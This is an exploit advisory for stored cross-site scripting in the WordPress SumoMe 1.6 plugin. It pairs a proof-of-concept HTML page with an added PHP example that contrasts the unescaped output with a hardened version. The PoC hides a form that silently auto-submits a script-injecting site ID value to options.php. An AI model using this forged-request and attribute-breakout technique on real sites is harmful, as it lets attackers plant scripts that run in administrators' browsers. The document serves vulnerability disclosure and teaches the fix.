Wordpress sumome 1.6 Cross Site Scripting Vulnerability



EKU-ID: 4489 CVE: OSVDB-ID:
Author: Ashiyane Published: 2015-01-06 Verified: Verified


######################
# Exploit Title : Wordpress sumome 1.6 Cross Site Scripting
  
# Exploit Author : Ashiyane Digital Security Team
  
# Vendor Homepage : https://wordpress.org/plugins/sumome/
  
# Software Link :https://downloads.wordpress.org/plugin/sumome.zip
  
# Date : 2015-01-03
  
# Tested on : Windows 7 / Mozilla Firefox
######################
  
# Location : http://127.0.0.1/wordpress/wp-admin/options-general.php?page=sumome
  
######################
  
Exploit Code:
  
<html>
<body>
<style>
#test{
display:none;
}
</style>

<!-- Hidden form replaying the plugin's settings POST to options.php.
     WordPress nonces are per-user, per-session and expire within 24 hours,
     so the hard-coded _wpnonce below is only valid for the session it was
     copied from; without a nonce valid for the victim, options.php rejects
     the request (check_admin_referer) and nothing is stored. -->
<div id="test">
<form method="post" action="http://localhost/wordpress/wp-admin/options.php">
<input type='hidden' name='option_page' value='sumome' /><input type="hidden"
name="action" value="update" /><input type="hidden" id="_wpnonce"
name="_wpnonce" value="934a83b2a9" /><input type="hidden"
name="_wp_http_referer"
value="/wordpress/wp-admin/options-general.php?page=sumome&amp;settings-updated=true" /> <div
class="sumome-instructions">

<!-- Payload: the leading "> closes the value="" attribute when the plugin
     echoes the stored option back into its settings page, and the script
     then runs for every administrator who opens that page. -->
<input type="text" name="sumome_site_id" id="sumome_site_id"
value='"><script>alert(1)</script>' style="width: 540px" />
<p class="submit"><input type="submit" name="submit" id="submit"
class="button button-primary" value="Save Changes" /></p> </div> </form>

</div>
<script>
// Auto-submit the hidden form as soon as the page has loaded.
function clickin(){
document.getElementById('submit').click()
}
setTimeout(clickin, 0);
</script>
</body>
</html>
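The PoC above shows only where the payload lands. The block below is an added example, not the SumoMe plugin's own source: it reconstructs the settings-field pattern the payload targets (a stored option echoed unescaped into a value="" attribute) beside the hardened form a WordPress plugin should use. Only the option name sumome_site_id and the option group sumome are taken from the advisory's form; the function names vuln_render_field, safe_render_field and sanitize_sumome_site_id, the site-ID allowlist regex, and the register_setting() wiring are assumptions for illustration.

```php
<?php
/*
 * Added example, not the SumoMe plugin's code. Reconstructs the pattern
 * implied by the PoC (option echoed into value="" unescaped) and the fix.
 * Assumed names: vuln_render_field, safe_render_field, sanitize_sumome_site_id.
 */

// Vulnerable pattern: the stored option is concatenated straight into the
// attribute. With the PoC value  "><script>alert(1)</script>  the quote
// closes the attribute and the script executes in the admin's browser.
function vuln_render_field() {
    $site_id = get_option( 'sumome_site_id' );
    echo '<input type="text" name="sumome_site_id" id="sumome_site_id" value="' . $site_id . '" />';
}

// Hardened output: esc_attr() turns " < > & ' into entities, so whatever is
// in the database cannot break out of the attribute or start a tag.
function safe_render_field() {
    $site_id = get_option( 'sumome_site_id', '' );
    printf(
        '<input type="text" name="sumome_site_id" id="sumome_site_id" value="%s" />',
        esc_attr( $site_id )
    );
}

// Hardened input: register_setting() makes options.php run this callback
// before saving, so a payload is rejected before it reaches the database.
// The allowed character set and length are an assumption for illustration;
// tighten it to whatever format the real service issues as a site ID.
function sanitize_sumome_site_id( $value ) {
    $value = sanitize_text_field( $value );
    if ( ! preg_match( '/^[A-Za-z0-9_-]{1,64}$/', $value ) ) {
        add_settings_error(
            'sumome_site_id',
            'invalid_site_id',
            __( 'Site ID may only contain letters, digits, "-" and "_".' )
        );
        // Keep the previously stored value instead of writing the bad one.
        return get_option( 'sumome_site_id', '' );
    }
    return $value;
}

add_action( 'admin_init', function () {
    // Third argument is the sanitize callback (still accepted as a plain
    // callable by register_setting() in current WordPress releases).
    register_setting( 'sumome', 'sumome_site_id', 'sanitize_sumome_site_id' );
} );
```

Both halves matter: the sanitize callback stops this PoC, but escaping at output with esc_attr() is what protects the page if the option is ever written by another code path (an import, a migration, direct database access) that bypasses the Settings API. Note that options.php already enforces the manage_options capability and the settings nonce; the plugin's bug is in how it renders the value, not in who may set it.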